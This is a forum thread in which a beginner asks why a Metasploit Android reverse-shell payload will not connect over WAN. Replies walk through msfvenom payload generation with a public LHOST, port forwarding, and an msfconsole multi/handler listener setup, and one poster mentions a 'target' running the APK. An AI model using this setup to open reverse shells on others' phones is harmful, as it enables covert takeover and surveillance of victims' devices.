Forum Thread: Metasploit Android Hacking Over WAN Not Working! Help.

Hi guys!

I am new to hacking. I used the msfvenom to create a payload and sent it to my phone. LHOST was my private IP address and port was 4444, I set up the listener, and it worked.

But, over WAN, when I use my public IP in the payload and private IP in the listener, it doesn't establish a connection with my phone. Why does it happen. Help would be really appreciated.

15 Responses

have u forwarded the ports?

You need to set Public IP in the listener, too. Because it will listen on that IP using port. So check port forwarding and set PUBLIC IP in the listener.

Could you please explain a little bit more about your dilema. What you just said is very vague, I mean what is the exact error that is occurring?

No, I understand it. It's not vague. He is trying to say it's not connecting when using WAN connection. As I said, use your public IP in listener and open port 4444 in your network.

If you set the listener to the public IP address on your attacking machine it will fail to bind and default to 0.0.0.0 because the address belongs to the router/gateway and does not belong to your attacking machine. It will still work though because 0.0.0.0 will bind all local IP's.

Sounds to me like you need to start by checking your port forward.

That's not true... It can fail binding but it doesn't have to. I actually did some successful attacks and it didn't fail... That's because port 44444 is forwarded only on my PC so it won't work for entire network.

It is true that the listener (multi/handler) cannot bind to the public IP address of the router/gateway and it will then default to 0.0.0.0.

This can be ignored if you have the port forward setup and you will still get your shell. This is because the router/gateway will forward the traffic for that port to your attacking machine and the attacking machine will be listening on all interfaces (0.0.0.0).

In Faizan Abrar's case he is simply executing his pre-made payload on his mobile device. So he would create it with something like this:

msfvenom -p <reverse_payload> LHOST=Public_IP LPORT=4444 -f <format> -o <output>

Then he would port forward incoming traffic on port 4444 from his router/gateway to his attacking machine's local IP address.

Then he would setup his listener:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD <reverse_payload>
PAYLOAD => <reverse_payload>
msf exploit(handler) > set LHOST local_IP
LHOST => local_IP
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run
* Started reverse handler on local_IP:4444
* Starting the payload handler...

If he were using a metasploit module he could either set the LHOST as his public IP address and let the listener default to 0.0.0.0 or disable the payload handler and set it up separately as above, only that is more steps for no reason in that case.

this is what i do exactly but the listener just works on a same network and does not work when my phone and attack machine are not in a same network. (my laptop is connected to my home network and phone is on Cell Data)

my commands:
msfvenom -p <reversepayload> ..LHOST= <External IP> LPORT=4444...

msfconsole:
set PAYLOAD: <reversepayload>
set LHOST=my local IP
set LPORT=4444

my local IP is 192.168.1.104 and have forwarded the 4444port to this IP.

Well if I had to guess it would be either your port forward is not setup properly or something is blocking the reverse connection. You could do a test by running a packet capture on your LAN (wireshark/tcpdump) then try to simply telnet or netcat to your public IP address from a remote network on the forwarded port. If everything is setup correctly you should be able to watch the traffic.

I don't know how..but my problem is solved!!!! but when my target runs APK file..connection fails after a short while. but when I try on my phone it works well. my phone is on LTE and my laptop is connected to my home network. ( separate networks).

bro help me how to port forward my external ip address. on android 7.1.2. can u please reply me.

ahhh... I didn't understand what exactly what was going on because I haven't experienced enough yet with metasploit. Thanks for the explanation.:)

Do what he said. You have payload so make listener like he said above. Use your local IP, BUT, you can use your public IP, too. It may fail to bind, but that's not a problem. But I was using public IP in my listeners and it didn't fail to bind.

Hello everyone i need help in android hacking on wan. I have too much confusion and two problems

hi guys
i have kali on Vb
i use bridge to access internet
i have different local ip for my windows and kali runing on Vb
is this make any changes?

Share Your Thoughts

  • Hot
  • Active